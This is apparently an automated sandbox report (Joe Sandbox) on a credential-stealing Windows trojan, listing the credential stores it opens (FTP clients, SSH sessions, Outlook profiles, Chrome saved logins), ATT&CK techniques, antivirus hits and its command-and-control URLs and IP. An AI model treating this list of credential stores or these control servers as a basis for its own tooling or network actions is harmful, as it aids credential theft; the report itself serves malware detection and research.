Source: C:\Users\user\Desktop\PI#53034601506400.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook
Source: C:\Users\user\Desktop\PI#53034601506400.exe | Key opened: HKEY_CURRENT_USER\Software\9bis.com\KiTTY\Sessions
Source: C:\Users\user\Desktop\PI#53034601506400.exe | Key opened: HKEY_CURRENT_USER\Software\Martin Prikryl
Source: C:\Users\user\Desktop\PI#53034601506400.exe | File opened: HKEY_CURRENT_USER\Software\Far2\Plugins\FTP\Hosts
Source: C:\Users\user\Desktop\PI#53034601506400.exe | File opened: HKEY_CURRENT_USER\Software\NCH Software\ClassicFTP\FTPAccounts
Source: C:\Users\user\Desktop\PI#53034601506400.exe | File opened: HKEY_CURRENT_USER\Software\FlashPeak\BlazeFtp\Settings
Source: C:\Users\user\Desktop\PI#53034601506400.exe | File opened: HKEY_CURRENT_USER\Software\Far\Plugins\FTP\Hosts
Source: C:\Users\user\Desktop\PI#53034601506400.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: Yara match | File source: 0.2.PI#53034601506400.exe.36e9f68.6.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.PI#53034601506400.exe.38976c0.9.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.0.PI#53034601506400.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.PI#53034601506400.exe.2575394.3.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.PI#53034601506400.exe.2569148.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.PI#53034601506400.exe.3633990.4.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.PI#53034601506400.exe.2561efc.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.PI#53034601506400.exe.3525928.5.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000000.00000002.328500909.0000000002538000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.343096170.0000000003897000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.340586638.0000000003525000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000000.323196487.0000000000415000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
MITRE ATT&CK Matrix (numbers in front of a technique are the report's occurrence markers for that technique):

Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
Valid Accounts | Windows Management Instrumentation | Path Interception | 111 Process Injection | 1 Masquerading | 2 OS Credential Dumping | 111 Security Software Discovery | Remote Services | 1 Email Collection | Exfiltration Over Other Network Medium | 1 Encrypted Channel | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | Boot or Logon Initialization Scripts | 1 Disable or Modify Tools | 1 Input Capture | 31 Virtualization/Sandbox Evasion | Remote Desktop Protocol | 1 Input Capture | Exfiltration Over Bluetooth | 1 Non-Application Layer Protocol | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
Domain Accounts | At (Linux) | Logon Script (Windows) | Logon Script (Windows) | 31 Virtualization/Sandbox Evasion | 1 Credentials in Registry | 1 Application Window Discovery | SMB/Windows Admin Shares | 1 Archive Collected Data | Automated Exfiltration | 111 Application Layer Protocol | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | 111 Process Injection | NTDS | 13 System Information Discovery | Distributed Component Object Model | 2 Data from Local System | Scheduled Transfer | Protocol Impersonation | SIM Card Swap | | Carrier Billing Fraud
Cloud Accounts | Cron | Network Logon Script | Network Logon Script | 1 Obfuscated Files or Information | LSA Secrets | Remote System Discovery | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | | Manipulate App Store Rankings or Ratings
Replication Through Removable Media | Launchd | Rc.common | Rc.common | 12 Software Packing | Cached Domain Credentials | System Owner/User Discovery | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | | Abuse Accessibility Features
External Remote Services | Scheduled Task | Startup Items | Startup Items | 1 Timestomp | DCSync | Network Sniffing | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | | Data Encrypted for Impact
Antivirus detection (sample):

Source | Detection | Scanner | Label
PI#53034601506400.exe | 10% | ReversingLabs | ByteCode-MSIL.Packed.Generic

Dropped files: No Antivirus matches

Antivirus detection (unpacked PE files):

Source | Detection | Scanner | Label
1.0.PI#53034601506400.exe.400000.0.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
0.2.PI#53034601506400.exe.3525928.5.unpack | 100% | Avira | HEUR/AGEN.1244307
0.2.PI#53034601506400.exe.38976c0.9.unpack | 100% | Avira | TR/Crypt.XPACK.Gen

Domains: No Antivirus matches

URL reputation:

Source | Detection | Scanner | Label
http://www.founder.com.cn/cnQ | 0% | URL Reputation | safe
http://www.founder.com.cn/cn/bThe | 0% | URL Reputation | safe
http://www.ibsensoftware.com/ | 0% | URL Reputation | safe
http://www.founder.com.cn/cnU | 0% | URL Reputation | safe
http://www.tiro.com | 0% | URL Reputation | safe
http://www.goodfont.co.kr | 0% | URL Reputation | safe
http://www.jiyu-kobo.co.jp/jp/: | 0% | URL Reputation | safe
http://www.sajatypeworks.com | 0% | URL Reputation | safe
http://www.typography.netD | 0% | URL Reputation | safe
http://www.typography.netD | 0% | URL Reputation | safe
http://www.founder.com.cn/cn/cThe | 0% | URL Reputation | safe
http://www.founder.com.cn/cn/cThe | 0% | URL Reputation | safe
http://www.galapagosdesign.com/staff/dennis.htm | 0% | URL Reputation | safe
http://fontfabrik.com | 0% | URL Reputation | safe
http://www.jiyu-kobo.co.jp/5 | 0% | URL Reputation | safe
http://www.jiyu-kobo.co.jp// | 0% | URL Reputation | safe
http://www.galapagosdesign.com/DPlease | 0% | URL Reputation | safe
http://www.sandoll.co.kr | 0% | URL Reputation | safe
http://www.urwpp.deDPlease | 0% | URL Reputation | safe
http://www.urwpp.de | 0% | URL Reputation | safe
http://www.zhongyicts.com.cn | 0% | URL Reputation | safe
http://www.sakkal.com | 0% | URL Reputation | safe
http://kbfvzoboss.bid/alien/fre.php | 0% | URL Reputation | safe
http://alphastand.top/alien/fre.php | 0% | URL Reputation | safe
http://www.jiyu-kobo.co.jp/I | 0% | URL Reputation | safe
http://alphastand.win/alien/fre.php | 0% | URL Reputation | safe
http://alphastand.trade/alien/fre.php | 0% | URL Reputation | safe
http://www.jiyu-kobo.co.jp/jp/ | 0% | URL Reputation | safe
http://www.carterandcone.coml | 0% | URL Reputation | safe
http://www.founder.com.cn/cn/ | 0% | URL Reputation | safe
http://www.founder.com.cn/cn | 0% | URL Reputation | safe
http://www.founder.com.cn/cnGg | 0% | Avira URL Cloud | safe
http://www.jiyu-kobo.co.jp/r | 0% | URL Reputation | safe
http://www.sajatypeworks.com7 | 0% | Avira URL Cloud | safe
http://www.jiyu-kobo.co.jp/Y0m | 0% | Avira URL Cloud | safe
http://www.urwpp.deu4 | 0% | Avira URL Cloud | safe
http://www.fontbureau.comm | 0% | URL Reputation | safe
http://www.jiyu-kobo.co.jp/ | 0% | URL Reputation | safe
http://www.founder.com.cn/cnion | 0% | Avira URL Cloud | safe
http://www.jiyu-kobo.co.jp/d | 0% | URL Reputation | safe
http://www.founder.com.cn/cno_ | 0% | Avira URL Cloud | safe
http://www.fontbureau.comgrita5 | 0% | Avira URL Cloud | safe
No contacted domains info

Contacted URLs:

Name | Malicious | Antivirus Detection | Reputation
http://kbfvzoboss.bid/alien/fre.php | true | URL Reputation: safe | unknown
http://alphastand.top/alien/fre.php | true | URL Reputation: safe | unknown
http://alphastand.win/alien/fre.php | true | URL Reputation: safe | unknown
http://alphastand.trade/alien/fre.php | true | URL Reputation: safe | unknown
URLs from memory and binaries:

Name | Source | Malicious | Antivirus Detection | Reputation
http://www.fontbureau.com/designersG | PI#53034601506400.exe, 00000000.00000002.344357322.0000000006C52000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.founder.com.cn/cnQ | PI#53034601506400.exe, 00000000.00000003.308708832.0000000005A53000.00000004.00000800.00020000.00000000.sdmp, PI#53034601506400.exe, 00000000.00000003.308753663.0000000005A54000.00000004.00000800.00020000.00000000.sdmp, PI#53034601506400.exe, 00000000.00000003.308640910.0000000005A50000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.fontbureau.com/designers/? | PI#53034601506400.exe, 00000000.00000002.344357322.0000000006C52000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.founder.com.cn/cn/bThe | PI#53034601506400.exe, 00000000.00000002.344357322.0000000006C52000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.fontbureau.com/designers? | PI#53034601506400.exe, 00000000.00000002.344357322.0000000006C52000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.ibsensoftware.com/ | PI#53034601506400.exe, 00000000.00000002.328500909.0000000002538000.00000004.00000800.00020000.00000000.sdmp, PI#53034601506400.exe, 00000000.00000002.340586638.0000000003525000.00000004.00000800.00020000.00000000.sdmp, PI#53034601506400.exe, 00000000.00000002.343096170.0000000003897000.00000004.00000800.00020000.00000000.sdmp, PI#53034601506400.exe, 00000001.00000000.323196487.0000000000415000.00000040.00000400.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.sajatypeworks.com7 | PI#53034601506400.exe, 00000000.00000003.306344407.0000000005A4C000.00000004.00000800.00020000.00000000.sdmp, PI#53034601506400.exe, 00000000.00000003.306358549.0000000005A4D000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.founder.com.cn/cnU | PI#53034601506400.exe, 00000000.00000003.308708832.0000000005A53000.00000004.00000800.00020000.00000000.sdmp, PI#53034601506400.exe, 00000000.00000003.308753663.0000000005A54000.00000004.00000800.00020000.00000000.sdmp, PI#53034601506400.exe, 00000000.00000003.308640910.0000000005A50000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.tiro.com | PI#53034601506400.exe, 00000000.00000002.344357322.0000000006C52000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.fontbureau.com/designers | PI#53034601506400.exe, 00000000.00000002.344357322.0000000006C52000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.goodfont.co.kr | PI#53034601506400.exe, 00000000.00000002.344357322.0000000006C52000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.jiyu-kobo.co.jp/jp/: | PI#53034601506400.exe, 00000000.00000003.310562802.0000000005A43000.00000004.00000800.00020000.00000000.sdmp, PI#53034601506400.exe, 00000000.00000003.310914397.0000000005A48000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.sajatypeworks.com | PI#53034601506400.exe, 00000000.00000003.306344407.0000000005A4C000.00000004.00000800.00020000.00000000.sdmp, PI#53034601506400.exe, 00000000.00000002.344357322.0000000006C52000.00000004.00000800.00020000.00000000.sdmp, PI#53034601506400.exe, 00000000.00000003.306358549.0000000005A4D000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.typography.netD | PI#53034601506400.exe, 00000000.00000002.344357322.0000000006C52000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe; URL Reputation: safe | unknown
http://www.founder.com.cn/cn/cThe | PI#53034601506400.exe, 00000000.00000002.344357322.0000000006C52000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe; URL Reputation: safe | unknown
http://www.galapagosdesign.com/staff/dennis.htm | PI#53034601506400.exe, 00000000.00000002.344357322.0000000006C52000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.urwpp.deu4 | PI#53034601506400.exe, 00000000.00000003.311913695.0000000005A58000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://fontfabrik.com | PI#53034601506400.exe, 00000000.00000002.344357322.0000000006C52000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.jiyu-kobo.co.jp/5 | PI#53034601506400.exe, 00000000.00000003.310914397.0000000005A48000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.jiyu-kobo.co.jp// | PI#53034601506400.exe, 00000000.00000003.310562802.0000000005A43000.00000004.00000800.00020000.00000000.sdmp, PI#53034601506400.exe, 00000000.00000003.310914397.0000000005A48000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.jiyu-kobo.co.jp/Y0m | PI#53034601506400.exe, 00000000.00000003.310562802.0000000005A43000.00000004.00000800.00020000.00000000.sdmp, PI#53034601506400.exe, 00000000.00000003.310914397.0000000005A48000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.galapagosdesign.com/DPlease | PI#53034601506400.exe, 00000000.00000002.344357322.0000000006C52000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.fontbureau.com/designers/pe.M | PI#53034601506400.exe, 00000000.00000003.312213384.0000000005A58000.00000004.00000800.00020000.00000000.sdmp, PI#53034601506400.exe, 00000000.00000003.312084396.0000000005A58000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.fonts.com | PI#53034601506400.exe, 00000000.00000002.344357322.0000000006C52000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.sandoll.co.kr | PI#53034601506400.exe, 00000000.00000002.344357322.0000000006C52000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.urwpp.deDPlease | PI#53034601506400.exe, 00000000.00000002.344357322.0000000006C52000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.urwpp.de | PI#53034601506400.exe, 00000000.00000003.311913695.0000000005A58000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.zhongyicts.com.cn | PI#53034601506400.exe, 00000000.00000002.344357322.0000000006C52000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | PI#53034601506400.exe, 00000000.00000002.328171471.00000000024E1000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.sakkal.com | PI#53034601506400.exe, 00000000.00000002.344357322.0000000006C52000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://centos.org | PI#53034601506400.exe, 00000001.00000002.352185413.0000000002F87000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.apache.org/licenses/LICENSE-2.0 | PI#53034601506400.exe, 00000000.00000002.344357322.0000000006C52000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.fontbureau.com | PI#53034601506400.exe, 00000000.00000002.344357322.0000000006C52000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://apache.org | PI#53034601506400.exe, 00000001.00000002.352185413.0000000002F87000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.jiyu-kobo.co.jp/I | PI#53034601506400.exe, 00000000.00000003.310914397.0000000005A48000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.jiyu-kobo.co.jp/jp/ | PI#53034601506400.exe, 00000000.00000003.310914397.0000000005A48000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.founder.com.cn/cnGg | PI#53034601506400.exe, 00000000.00000003.308708832.0000000005A53000.00000004.00000800.00020000.00000000.sdmp, PI#53034601506400.exe, 00000000.00000003.308753663.0000000005A54000.00000004.00000800.00020000.00000000.sdmp, PI#53034601506400.exe, 00000000.00000003.308640910.0000000005A50000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.carterandcone.coml | PI#53034601506400.exe, 00000000.00000002.344357322.0000000006C52000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.centos.org/ | PI#53034601506400.exe, 00000001.00000002.352185413.0000000002F87000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.founder.com.cn/cn/ | PI#53034601506400.exe, 00000000.00000003.308708832.0000000005A53000.00000004.00000800.00020000.00000000.sdmp, PI#53034601506400.exe, 00000000.00000003.308753663.0000000005A54000.00000004.00000800.00020000.00000000.sdmp, PI#53034601506400.exe, 00000000.00000003.308640910.0000000005A50000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.fontbureau.com/designers/cabarga.htmlN | PI#53034601506400.exe, 00000000.00000002.344357322.0000000006C52000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.founder.com.cn/cnion | PI#53034601506400.exe, 00000000.00000003.308277205.0000000005A6F000.00000004.00000800.00020000.00000000.sdmp, PI#53034601506400.exe, 00000000.00000003.308234434.0000000005A6E000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.founder.com.cn/cn | PI#53034601506400.exe, 00000000.00000003.308708832.0000000005A53000.00000004.00000800.00020000.00000000.sdmp, PI#53034601506400.exe, 00000000.00000003.308753663.0000000005A54000.00000004.00000800.00020000.00000000.sdmp, PI#53034601506400.exe, 00000000.00000002.344357322.0000000006C52000.00000004.00000800.00020000.00000000.sdmp, PI#53034601506400.exe, 00000000.00000003.308277205.0000000005A6F000.00000004.00000800.00020000.00000000.sdmp, PI#53034601506400.exe, 00000000.00000003.308234434.0000000005A6E000.00000004.00000800.00020000.00000000.sdmp, PI#53034601506400.exe, 00000000.00000003.308640910.0000000005A50000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.fontbureau.com/designers/frere-jones.html | PI#53034601506400.exe, 00000000.00000002.344357322.0000000006C52000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.jiyu-kobo.co.jp/r | PI#53034601506400.exe, 00000000.00000003.310562802.0000000005A43000.00000004.00000800.00020000.00000000.sdmp, PI#53034601506400.exe, 00000000.00000003.310333869.0000000005A43000.00000004.00000800.00020000.00000000.sdmp, PI#53034601506400.exe, 00000000.00000003.310914397.0000000005A48000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://httpd.apache.org/ | PI#53034601506400.exe, 00000001.00000002.352185413.0000000002F87000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.fontbureau.com/designers/pe. | PI#53034601506400.exe, 00000000.00000003.312172741.0000000005A58000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.founder.com.cn/cno_ | PI#53034601506400.exe, 00000000.00000003.308708832.0000000005A53000.00000004.00000800.00020000.00000000.sdmp, PI#53034601506400.exe, 00000000.00000003.308753663.0000000005A54000.00000004.00000800.00020000.00000000.sdmp, PI#53034601506400.exe, 00000000.00000003.308640910.0000000005A50000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.fontbureau.comm | PI#53034601506400.exe, 00000000.00000003.325770393.0000000005A4B000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.jiyu-kobo.co.jp/ | PI#53034601506400.exe, 00000000.00000003.310914397.0000000005A48000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.fontbureau.comgrita5 | PI#53034601506400.exe, 00000000.00000003.325770393.0000000005A4B000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.fontbureau.com/designers8 | PI#53034601506400.exe, 00000000.00000002.344357322.0000000006C52000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.jiyu-kobo.co.jp/d | PI#53034601506400.exe, 00000000.00000003.310562802.0000000005A43000.00000004.00000800.00020000.00000000.sdmp, PI#53034601506400.exe, 00000000.00000003.310914397.0000000005A48000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
IP | Domain | Country | Flag | ASN | ASN Name | Malicious
162.0.223.13 | unknown | Canada | | 35893 | ACPCA | true
                                                Joe Sandbox Version:36.0.0 Rainbow Opal
                                                Analysis ID:708241
                                                Start date and time:2022-09-23 07:57:19 +02:00
                                                Joe Sandbox Product:CloudBasic
                                                Overall analysis duration:0h 5m 35s
                                                Hypervisor based Inspection enabled:false
                                                Report type:full
                                                Sample file name:PI#53034601506400.exe
                                                Cookbook file name:default.jbs
                                                Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                Number of analysed new started processes analysed:2
                                                Number of new started drivers analysed:0
                                                Number of existing processes analysed:0
                                                Number of existing drivers analysed:0
                                                Number of injected processes analysed:0
                                                Technologies:
                                                • HCA enabled
                                                • EGA enabled
                                                • HDC enabled
                                                • AMSI enabled
                                                Analysis Mode:default
                                                Analysis stop reason:Timeout
                                                Detection:MAL
                                                Classification:mal100.troj.spyw.evad.winEXE@3/3@0/1
                                                EGA Information:
                                                • Successful, ratio: 100%
                                                HDC Information:Failed
                                                HCA Information:
                                                • Successful, ratio: 96%
                                                • Number of executed functions: 11
                                                • Number of non-executed functions: 0
                                                Cookbook Comments:
                                                • Found application associated with file extension: .exe
                                                • Stop behavior analysis, all processes terminated
                                                • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                • Report size getting too big, too many NtQueryValueKey calls found.
Time | Type | Description
07:58:29 | API Interceptor | 77x Sleep call for process: PI#53034601506400.exe modified
                                                Process:C:\Users\user\Desktop\PI#53034601506400.exe
                                                File Type:ASCII text, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):1394
                                                Entropy (8bit):5.340883346054895
                                                Encrypted:false
                                                SSDEEP:24:MLUE4K5E4Ks2E1qE4bE4KnKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4x84F0:MIHK5HKXE1qHbHKnYHKhQnoPtHoxHhAR
                                                MD5:B51A52A837298BCF7A6EB58551AEF99C
                                                SHA1:61EEFCC20AC255B8651769E5C48E27B2A983FC4A
                                                SHA-256:1D393FBB3CE754EA699462C2778587A7F2451EB23BE2BD5084C95A46B20BE8AF
                                                SHA-512:138544399787651C847837719606197E539857206CCB271E0F4A86E2017FBADABADF5A235B6F6F1DA8ADE7EF29DBA3115CD1996AD01F92CA30C57D0BF217C11C
                                                Malicious:false
                                                Reputation:moderate, very likely benign file
                                                Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"System.Data, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e08
                                                Process:C:\Users\user\Desktop\PI#53034601506400.exe
                                                File Type:very short file (no magic)
                                                Category:dropped
                                                Size (bytes):1
                                                Entropy (8bit):0.0
                                                Encrypted:false
                                                SSDEEP:3:U:U
                                                MD5:C4CA4238A0B923820DCC509A6F75849B
                                                SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                Malicious:false
                                                Reputation:high, very likely benign file
                                                Preview:1
                                                Process:C:\Users\user\Desktop\PI#53034601506400.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):47
                                                Entropy (8bit):1.168829563685559
                                                Encrypted:false
                                                SSDEEP:3:/lSll2DQi:AoMi
                                                MD5:DAB633BEBCCE13575989DCFA4E2203D6
                                                SHA1:33186D50F04C5B5196C1FCC1FAD17894B35AC6C7
                                                SHA-256:1C00FBA1B82CD386E866547F33E1526B03F59E577449792D99C882DEF05A1D17
                                                SHA-512:EDDBB22D9FC6065B8F5376EC95E316E7569530EFAA9EA9BC641881D763B91084DCCC05BC793E8E29131D20946392A31BD943E8FC632D91EE13ABA7B0CD1C626F
                                                Malicious:false
                                                Reputation:moderate, very likely benign file
                                                Preview:........................................user.
                                                File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                Entropy (8bit):6.864314970810788
                                                TrID:
                                                • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                • Win32 Executable (generic) a (10002005/4) 49.78%
                                                • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                • Generic Win/DOS Executable (2004/3) 0.01%
                                                • DOS Executable Generic (2002/1) 0.01%
                                                File name:PI#53034601506400.exe
                                                File size:864768
                                                MD5:05d1649e1b980b3d59b189a2fe07fc3c
                                                SHA1:9227eb122ce621fa3f7375c4a0ac4becd45b82c0
                                                SHA256:66f1a748e30aaa66b2053848270d68f5dc3ec9ccd4b9a5dbaa6a6dfd3139490c
                                                SHA512:416a319477478c75af755e598451a7a71753ff6d956f327fe08d5d207f455e5e4f1717a008af6eb441a1d083c47b1f185576ee8bcff860162553ce237253a5d2
                                                SSDEEP:24576:8hLuyygLvA4Bk+3F4LneWDL23YmEJxvNT:oLuyygLvA4i+36SA2IZ/V
                                                TLSH:8405D0371AEA4B0BD12873B491E1C6F593B99D12E066C3876FC57C9FB0677208B21762
                                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....Kt...............0..*...........I... ...`....@.. ....................................@................................
                                                Icon Hash:00828e8e8686b000
                                                Entrypoint:0x4d49fa
                                                Entrypoint Section:.text
                                                Digitally signed:false
                                                Imagebase:0x400000
                                                Subsystem:windows gui
                                                Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                Time Stamp:0x92744BED [Mon Nov 11 14:25:49 2047 UTC]
                                                TLS Callbacks:
                                                CLR (.Net) Version:
                                                OS Version Major:4
                                                OS Version Minor:0
                                                File Version Major:4
                                                File Version Minor:0
                                                Subsystem Version Major:4
                                                Subsystem Version Minor:0
                                                Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                                Instruction
                                                jmp dword ptr [00402000h]
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0xd49a8 | 0x4f | .text
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xd6000 | 0x3e8 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0xd8000 | 0xc | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0xd498c | 0x1c | .text
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x2000 | 0xd2a00 | 0xd2a00 | False | 0.7079770956973294 | data | 6.8711614725083345 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc | 0xd6000 | 0x3e8 | 0x400 | False | 0.408203125 | data | 3.1405939185942064 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0xd8000 | 0xc | 0x200 | False | 0.044921875 | data | 0.10191042566270775 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country
RT_VERSION | 0xd6058 | 0x38c | PGP symmetric key encrypted data - Plaintext or unencrypted data | |
DLL | Import
mscoree.dll | _CorExeMain
